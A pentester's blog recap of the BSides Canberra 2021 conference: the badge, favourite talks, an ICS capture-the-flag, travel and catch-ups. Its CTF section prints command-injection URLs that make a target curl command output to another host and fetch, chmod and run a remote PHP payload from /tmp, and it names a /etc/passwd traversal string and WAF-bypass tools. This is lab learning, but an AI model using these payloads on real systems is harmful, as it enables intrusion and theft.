A change in perspective
It really is a surreal experience attending the conference from the standpoint of someone who is currently working in the industry.
Only a few years ago, I was the penultimate-year uni student who was trying to prove their worth in a rapidly advancing industry.
Now that I have finally set foot in it, there is a feeling of calmness —
Instead of focusing on maximizing the value gained from the conference
I decided this time to just catchup with old friends instead
The badge
Honestly? I never inspected the badge contents once during the conference.
Not even now, as I’m writing this one week post-conference.
A big shout out to the volunteers at @PentenCyber who fought through a busy time at work and a global parts shortage to deliver the @BSidesCbr badge to the community with the support of our friends at GME and @4design_news to make the badge in Sydney #madeinaustralia pic.twitter.com/PNAffZt17R
— Penten (@PentenCyber) April 8, 2021
If you were involved in the badge making team, I respect all the blood,sweat and tears you’ve put in. But seriously, the design is not ergonomic or intuitive at all!
I definitely wasn’t alone in this opinion as well:
- The badge was heavy and clunky compared to previous years
- The on switch (yes you read that right) couldn’t be reached with your bare hands as it was indented into the badge
Then again, I am probably just a whiny pentester who doesn’t know shit about hardware hacking and thus can’t appreciate the full value of the badge.
This blog post looks cool though!
The talks
Here are the talks that I was most interested in: [Scroll til “Main Track”]
some I watched; others I’ll have to wait til the recording comes out…
Title | Author(s) | Why I watched/will watch |
---|---|---|
The Security of Emojis | Adrian Justice | Thought it would be interesting, turned out it was a funny (but filler) presentation, still a good watch and reinforces the ideal of always challenging developers’ assumptions |
Easy LPEs and common software vulnerabilities | Christopher Vella | Haven’t watched yet but heard its good, especially for those heading down the vuln research path! |
The defender’s new clothes | Eldar Marcussen | (see below) |
13 Nagios Vulnerabilities, #7 will SHOCK you! | Samir Ghanem | (see below) |
Context Aware Content Discovery: The Natural Evolution | Assetnote | (see below) |
Understanding Real Threats for Real Security | Shane Hutley | Haven’t watched yet but recommended by few other people so will watch |
My takeaways
The defenders new clothes:
- I really enjoyed Eldar’s casual style of presentation, as though he is simply talking to himself on stage
- The interesting tadeoff between using string-based pattern matching and regex-based pattern matching in WAFs:
- One brings the risk of WAF Denial of Service due to malicious regex
- The other has an inherent risk of false negatives ie. bypasses
- Using a few of his tools:
travesty
,PHP-omelette
and so on… its possible to bypass WAFs or detection tools - Never underestimate the power of a good
//.///..//..///..///etc/passwd
NagiOS vulnerabilities:
- It gives me hope that vuln research is still alive and kicking, and that I should really get into it sometime!
- Never make assumptions about how the security of applications, despite the reputation of an org
- I really should look at NagiOS or other similar products to find CVEs in…
Context Aware Asset Discovery:
- I really love what AssetNote is doing at the moment, even though they are a small team, they are creating tools that larger firms would not be able to produce
- I think its also largely due to their business model being innovative and pushing the boundaries of what we think is possible
- What really makes them amazing is they care about the infosec community and always open source their tools and data for everyone to use, which is really heartwarming to say the least
- Big props to @sean who spent two months researching and building Kiterunner, I can see it being used as part of API testing in legit jobs, as well as by bounty hunters to find more obscure endpoints!!! Truly a great gift to all web-based researchers out there
Industrial Control Systems (ICS) CTF
I decided to play in this one because it was a good refresher exercise for OSCP/HTB-style challenges which resemble real-world scenarios:
Long-story-short: After playing, failing, and ultimately running out of time, I learnt the following new techniques:
WordPress challenge:
- When using
WPScan
, sometimes it might be worth using aggresive mode or you might miss the one plugin you need for the foothold
Command Injection challenge:
- Apparently you can actually abuse the
-p pattern
inping
command during command injection to exfiltrate 16 bytes of data at a time - Instead of trying to execute commands within the command itself, ie:
http://172.19.4.44/cgi-bin/device.cgi?command=ping&targetip=$(curl%2010.19.0.205?`id`)
One could instead opt to execute a staged-payload of sorts,
to avoid triggering filters/detections:http://172.19.4.44/cgi-bin/device.cgi?command=ping&targetip=$(curl%2010.19.0.205/data.txt%20>%20/tmp/evil.php) http://172.19.4.44/cgi-bin/device.cgi?command=ping&targetip=$(chmod%20711%20/tmp/evil.php) http://172.19.4.44/cgi-bin/device.cgi?command=ping&targetip=$(php%20/tmp/evil.php) # Altogether in three steps: curl 10.19.0.205/data.txt > evil.php; chmod 711 /tmp/evil.php; php /tmp/evil.php
My accomodation
- Thanks Privasec for paying for the hotel!
- The room was much larger than I expected, almost like an apartment!
- they even had a pool (I swam in it as well one night )
- It came with a kitchen setup which is great as I could prepare meals
Sydney Canberra flights
Again, thanks Privasec for sponsoring my to/fro flights This was my first time taking a plane from Sydney to Canberra:
- I felt like I waited at the airport (starting from gate opening) longer than the flight itself!
- 30 mins for everyone to board and take off, another 30 mins in the air
- It was a QantasLink Dash 8 Q400 airplane, with propellers on each side and only two seats per side
Catchups/New friendships
It was great to catch up with all my friends from various places such as:
- UNSW Security Society
- current Privasec colleagues
- ex-HackLabs colleagues
- ex-Pure Security colleagues
- other connections from Sydney/Melbourne
I also met new people from other penetration testing firms and also other student societies!
Also, I played this game at the Token Barcade and it was quite fun: